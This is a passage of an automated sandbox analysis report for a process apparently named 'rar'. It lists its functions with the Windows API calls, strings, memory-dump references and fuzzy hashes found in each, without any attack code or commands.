                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CAEE9
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CAF01
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CAF19
                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CAF75
                                                                                                                                                                                                                                        • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CAFB0
                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CB23B
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CB244
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6AA182E4C), ref: 00007FF6AA1CB287
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
                                                                                                                                                                                                                                        • String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
                                                                                                                                                                                                                                        • API String ID: 3483800833-4165214152
                                                                                                                                                                                                                                        • Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                                        • Instruction ID: ddae254502067edb3ae5358c8eb2397253bea820ca3ca6f09f8db10ffa4e3121
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AC18036A0AB81E5EB62DF21E8502BD27A1FF44B94F444076DA4E87795DF3CE946C700
                                                                                                                                                                                                                                        Function 00007FF6AA1CB57C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54shutdownCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                        • API String ID: 3729174658-3733053543
                                                                                                                                                                                                                                        • Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                                        • Instruction ID: c3d4aee32c15913bd71dae828e08157b52ee13b1954f085a104efab39b897a82
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F521AE32A1A682D2F791DB21E89537E63A1EF84744F90507BEA0E86558DF3DEC4A8700
                                                                                                                                                                                                                                        Function 00007FF6AA19E21C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF6AA182014), ref: 00007FF6AA19E298
                                                                                                                                                                                                                                        • FindClose.KERNEL32(?,?,?,00000001,?,00007FF6AA182014), ref: 00007FF6AA19E2AB
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF6AA182014), ref: 00007FF6AA19E2F7
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6AA19EE47), ref: 00007FF6AA19EF73
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6AA19EE47), ref: 00007FF6AA19EF84
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6AA19EFA7
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6AA19EFCA
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: GetLastError.KERNEL32 ref: 00007FF6AA19EFD4
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA19EF50: CloseHandle.KERNEL32 ref: 00007FF6AA19EFE7
                                                                                                                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 00007FF6AA19E357
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF6AA182014), ref: 00007FF6AA19E362
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                        • String ID: SeBackupPrivilege
                                                                                                                                                                                                                                        • API String ID: 3094086963-2429070247
                                                                                                                                                                                                                                        • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                                        • Instruction ID: 27cb79afddc4925e40a3f967b5b56ba73ebb213a2d5c60e910e106165e97e8a0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A961D032A09681E6EB268B21E5406FD33A0FB44794F404277DB6E87AD4DF3CE956C700
                                                                                                                                                                                                                                        Function 00007FF6AA1BAF0C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 427COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Sleepswprintf
                                                                                                                                                                                                                                        • String ID: $%ls%0*u.rev
                                                                                                                                                                                                                                        • API String ID: 407366315-3491873314
                                                                                                                                                                                                                                        • Opcode ID: 6228c723871ebb1e8296c1b1a0c22d4504545d7a69b0f2f459d85dbf46e0c821
                                                                                                                                                                                                                                        • Instruction ID: ed1d643cfc803812b5597adba8741ce439a356dbd86c186a1ae796dfeb9cd276
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6228c723871ebb1e8296c1b1a0c22d4504545d7a69b0f2f459d85dbf46e0c821
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8902F532B0A682D6EB21DF25E4842AD77A5FB88784F410177DE5D87B96DE3CE846C700
                                                                                                                                                                                                                                        Function 00007FF6AA1849B8 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • new.LIBCMT ref: 00007FF6AA184BD8
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1CB6D0: Sleep.KERNEL32(?,?,?,?,00007FF6AA19CBED,?,00000000,?,00007FF6AA1C7A8C), ref: 00007FF6AA1CB730
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A1E80: CreateFileW.KERNELBASE ref: 00007FF6AA1A1F4A
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A1E80: GetLastError.KERNEL32 ref: 00007FF6AA1A1F59
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A1E80: CreateFileW.KERNELBASE ref: 00007FF6AA1A1F99
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A1E80: GetLastError.KERNEL32 ref: 00007FF6AA1A1FA2
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1A1E80: SetFileTime.KERNEL32 ref: 00007FF6AA1A1FF1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast$SleepTime
                                                                                                                                                                                                                                        • String ID: %12s %s$%12s %s$ $%s
                                                                                                                                                                                                                                        • API String ID: 2965465231-221484280
                                                                                                                                                                                                                                        • Opcode ID: a57dd3f3df4f1046b3036346f8c71d84d6573ec975a401307e0b985712f7f48f
                                                                                                                                                                                                                                        • Instruction ID: 5992452ca4167017ed0fc16ba0828dbb52f1a375e38e4233027c57211b2ce6ab
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a57dd3f3df4f1046b3036346f8c71d84d6573ec975a401307e0b985712f7f48f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44F1C122B0AA82E6EB62DB22D4502BD67A1FB48BC4F444477DA4D87785DF3CED56C700
                                                                                                                                                                                                                                        Function 00007FF6AA1E4C10 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                        • Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                                        • Instruction ID: 5a2ac23e18356972cef1ca304da4f4070965b162fd2b450f09ad2c513136f70f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31316136609B81DADB61CF25E8402BE73A4FB89754F540136EA9D83B58DF3CD946CB00
                                                                                                                                                                                                                                        Function 00007FF6AA19EF50 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3398352648-0
                                                                                                                                                                                                                                        • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                                        • Instruction ID: b562f9a8d879f38552c6ab3cc845e33a920eb46b2553fd1be0bc5363ac0799d2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB116335619741D6EB508F21E84056E73A0FF88B80F44413BEA8E83658DF3CE806CB40
                                                                                                                                                                                                                                        Function 00007FF6AA1842E0 Relevance: 6.3, APIs: 4, Instructions: 344COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3116915952-0
                                                                                                                                                                                                                                        • Opcode ID: b50682ea8b281155ee065a764beae75b9f37a97ff4cffd0bdd8a4d9240ecf0c6
                                                                                                                                                                                                                                        • Instruction ID: 2ad2a5b321c565e63700096f8b1e5adb779d889b40abf431a77731e74dd94f89
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b50682ea8b281155ee065a764beae75b9f37a97ff4cffd0bdd8a4d9240ecf0c6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17E16326A1AA82E1EB22EB25D4501FD63A5FF89B84F4540B3DE4D87796DE3CD907C700
                                                                                                                                                                                                                                        Function 00007FF6AA1A3A70 Relevance: 6.1, APIs: 4, Instructions: 74fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,?,?,00007FF6AA1A11B0,?,?,?,00000000,?,?,00007FF6AA19F30F,00000000,00007FF6AA186380,?,00007FF6AA182EC8), ref: 00007FF6AA1A3AC4
                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,?,?,00007FF6AA1A11B0,?,?,?,00000000,?,?,00007FF6AA19F30F,00000000,00007FF6AA186380,?,00007FF6AA182EC8), ref: 00007FF6AA1A3B0A
                                                                                                                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 00007FF6AA1A3B55
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00007FF6AA1A11B0,?,?,?,00000000,?,?,00007FF6AA19F30F,00000000,00007FF6AA186380,?,00007FF6AA182EC8), ref: 00007FF6AA1A3B60
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateFile$CloseControlDeviceHandle
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 998109204-0
                                                                                                                                                                                                                                        • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
